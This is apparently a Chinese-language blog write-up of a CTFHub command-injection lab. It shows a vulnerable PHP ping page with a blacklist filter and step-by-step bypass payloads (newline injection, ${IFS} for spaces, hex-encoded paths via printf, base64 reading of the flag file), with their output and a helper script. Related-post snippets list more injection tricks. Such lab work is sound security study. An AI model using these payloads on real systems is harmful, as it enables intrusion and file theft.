ctfhub_REC_综合练习

最新推荐文章于 2024-04-18 21:45:16 发布
最新推荐文章于 2024-04-18 21:45:16 发布
阅读量1k 收藏 2
点赞数
分类专栏: 信息安全 CTF 文章标签: ctfhub php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/devil8123665/article/details/111936892
版权

目录

 

1 打开题目,查看如下源码

2代码分析

3查看当前路径

4查看flag_is_here目录

5获取flag值

6使用的python脚本

1 打开题目,查看如下源码

<?php
​
$res = FALSE;
​
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

2代码分析

1)通过代码可以分析得到,过滤了命令连接符号&、|、;因此常用命令连接符不可用,可以使用”%0a、%0d“及“\n,\v”。

2)空格符号也被过滤,可以使用${IFS}或者$IFS$9

3)路径连接符也被过滤,可以使用十六进制编码

通过python脚本

from urlib import parse
parse.quote()#url编码
parse.unquote()#url解码

3查看当前路径

payload:
?ip=127.0.0.1%0als#
结果:
Array
(
    [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
    [1] => flag_is_here
    [2] => index.php
)

4查看flag_is_here目录

利用printf命令将十六进制数据转换为字符串

# printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x38\x36\x30\x32\x34\x34\x39\x33\x35\x36\x30\x31\x2e\x70\x68\x70"
​
flag_is_here/flag_17860244935601.php

 

flag_is_here转为16进制:
\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65
payload:
?ip=127.0.0.1%0als${IFS}$(printf${IFS}%22\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65%22)#
返回值:
Array
(
    [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
    [1] => flag_17860244935601.php
)

5获取flag值

1)通过返回值可知,flag文件为php文件,不能直接读取,因此进行base64编码

flag_is_here/flag_17860244935601.php转为16进制:
\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x38\x36\x30\x32\x34\x34\x39\x33\x35\x36\x30\x31\x2e\x70\x68\x70
payload;
ip=127.0.0.1%0abase64<$(printf${IFS}%22\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x38\x36\x30\x32\x34\x34\x39\x33\x35\x36\x30\x31\x2e\x70\x68\x70%22)#
返回值:
Array
(
    [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
    [1] => PD9waHAgLy8gY3RmaHVie2YxZTVhZGYwZjliOGVkNTc0ODJlOThkY30K
)

2)base64转码

b'<?php // ctfhub{f1e5adf0f9b8ed57482e98dc}\n'

6使用的python脚本

#!C:\Python3.7
# -*- coding:utf-8 -*-
import requests
import base64
from urllib import parse
​
​
def char2hex(s):
    h=""
    for i in s:
        tem =(hex(ord(i)))
        h+=tem
​
    print(h)
    h=str(h).replace("0x","\\x")
    print(h)
​
if __name__ == '__main__':
  
    print(base64.b64decode("PD9waHAgLy8gY3RmaHVie2YxZTVhZGYwZjliOGVkNTc0ODJlOThkY30K"))
    
    char2hex("flag_is_here/flag_17860244935601.php")
    ##parse.quote()url编码
    ##parse.unquote()url解码
    # for i in range(128):
    #     print(i,parse.quote(chr(i)))
devil8123665
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
刷题错误记录
Bran_Wang12306的博客
07-16 138
1. 类的初始化顺序:首先按照顺序初始化父类中的静态变量和静态代码块,然后初始化子类中的静态变量和静态代码块,再就是初始化父类中的普通成员变量和代码块,再调用父类的构造方法,最后初始子类中的普通成员变量和代码块,再调用子类的构造方法。2.条件与&amp;&amp;:遵循短路原则,即运算时从左到右依次判断,一旦能够确定整个表达式的结果,就立即终止运算。3.static方法中不能直接调用类里的非sta...
pca_face_rec.rar_face recognization_rec
07-15
pca 人脸识别程序加上数据库 可以直接根据自己需求更改
rec_source.rar_NRF24L01_REC SOURCE_rec
09-20
NRF24L01 RECIEVER SOURCE code
ctfhub—rce 通关笔记
最新发布
2301_80489197的博客
04-18 230
这里进行了对cat的过滤,通过preg_match_all()函数在变量ip和m中搜索“cat”字符串,如果里面没有“cat”字符串,则会进行ping命令。这一关将||和&给过滤了,但是还可以用其他没有被过滤的运算符进行拼接。通过反斜杠‘\’或者单引号进行绕过,也可以用tac命令来反向输出。先用ls查看一下当前目录下有那些文件,看到flag,去看一下。可以看到这一关是没有任何过滤的,所以可以直接用‘|’进行拼接。ping完后页面上什么也没有,但是在源码中可以看到flag。看到flag,再去看一下。
ctfhub(rce智慧树)
qq_62046696的博客
07-21 537
刚看完rce知识点做一下题,巩固一下、
CTFWEB·通过CTFshow的例题来学习信息收集类题目的题型及对应做法
qq_54502707的博客
12-18 1958
大家好,这里是KOKO师傅~ WEB方向最简单的莫过于信息收集类型题目,我们以CTFshow的相关题目作为例题对这一类型的题目进行一个模块的针对练习
ctf php审计从题目中的过滤学习绕过
eliforsharon的博客
10-10 1287
目录基本介绍空格过滤 基本介绍 在进行ping命令执行时,能够通过截断来执行新的命令。 根据此原理来进行注入。 例子如下 ip=127.0.0.1;ls 空格过滤 考虑在进行命令注入时,过滤了空格,可以采用${IFS}、$IFS、$IFS$9的局部变量来表示分隔符,但考虑$IFS直接接字母时可能会被解析成其他变量,所以采用${IFS}固定变量,或者$IFS$9采用$9这个空字符来与后面字母分隔开来固定变量 ...
CTF 命令执行编码绕过的新思路
qq_25755011的博客
04-09 1267
前言 师弟师妹给20级开学考中的一道题,过滤非常严格,以常规拼接方法构造的话要构造非常长的payload,在研究的时候意外发现了一个新的方法,这里进行一下介绍。 题目源码 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/(\||&|;| |\/|'|\"|%|{|}|php|ca
命令注入————ctfhub(过滤cat、空格、目录分隔符、运算符、综合过滤练习
qq_45655564的博客
05-30 8253
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
BUUCTF-[GXYCTF2019] Ping Ping Ping
lunan的博客
05-15 961
BUUCTF-[GXYCTF2019] Ping Ping Ping 考点: 1、命令联合执行 2、命令绕过空格的方法 3、内联执行 一、命令联合执行 ; 前面的执行完执行后面的 | 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果) || 当前面的执行出错时(为假)执行后面的 & 将任务置于后台执行 && 前面的语句为假则直接出错,后面的也不执行,前面只能为真 %0a (换行) %0d (回车) 二、命令绕过空格的方法
CTFhub-RCE-读取源代码
ssss39的博客
11-13 421
这里的input是不起作用,看大佬说是allow_url_fopen没有开启。直接开始php://filter/resource=/flag,直接梭。那既然要等于php://,就和上题一样,试试php://input。题目要求又必须使用php://。而且flag就在/flag里。
rec.rar_rec_比较 无线
07-14
这是一个无线发送,接受的程序,比较完整,调试可通过
Rec.rar_REC 70_mid_mid VB_rec
09-24
Window mid rec VB Code
RFC.rar_rec_rfc 1242
07-15
好东西拿出来分享,非常有用,REC中文合集打包下载
xctfweb题(一):1~5题
xl2655894520的博客
01-23 2281
xctfweb题wp
新手区题目一:this_is_flag
阿拉马坠德的博客
07-10 709
新手区题目一:this_is_flag 题目描述为:大部分flag形式都为flag{xxx},例如:flag{th1s_!s_a_d4m0_4la9},固然此处flag答案为flag{th1s_!s_a_d4m0_4la9}本身。
CTFHub 技能树-- RCE(详解)
m0_62879498的博客
02-20 5128
CTFHub – RCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
CTFhub——命令执行
墨子辰的博客
02-04 1233
目录NO.1 无过滤注入NO.2 过滤catNO.3 过滤空格NO.4 过滤目录分隔符NO.5 过滤运算符NO.6 综合过滤练习 NO.1 无过滤注入 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> 代码中没有任何过滤 ?ip=|cat 307092239529587.p
CTFHub综合练习详解
YZP16670253193的博客
11-17 751
使用%0als得到一个flag_is_here文件夹和一个index.php文件,很明显index.php并不是我们要的flag而是网页PHP源码,那么flag肯定就在flag_is_here文件夹中,但网页已经过滤了空格和flag。这里我们可以利用url地址栏来构造payload ,在url中%0a代表换行当在ping后面接上%0a便可执行下一条命令(建议使用burp抓包,因为。最后只需要CD去这个文件夹并打开flag文件就行了,在LINUX中打开文件可以用。这样就得到一个装有flagphp文件了。
ROI = oriimg2[max_rec[1]:max_rec[1] + max_rec[3], max_rec[0]:max_rec[0] + max_rec[2], :]中 1.为什么要max_rec[1] + max_rec[3],可不可以换别的数字:
05-30
在这段代码中,`max_rec` 是一个矩形框的坐标,其中 `max_rec[1]` 和 `max_rec[0]` 分别是矩形框左上角的横纵坐标。`max_rec[2]` 和 `max_rec[3]` 分别是矩形框的宽度和高度。因此,`max_rec[1] + max_rec[3]` 表示矩形框底部的纵坐标。 如果您想要选择不同的数字,那么必须确保选择的数字不会超出原始图像的边界,同时可以覆盖整个感兴趣区域。具体而言,您需要选择一个大于等于 `max_rec[1]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值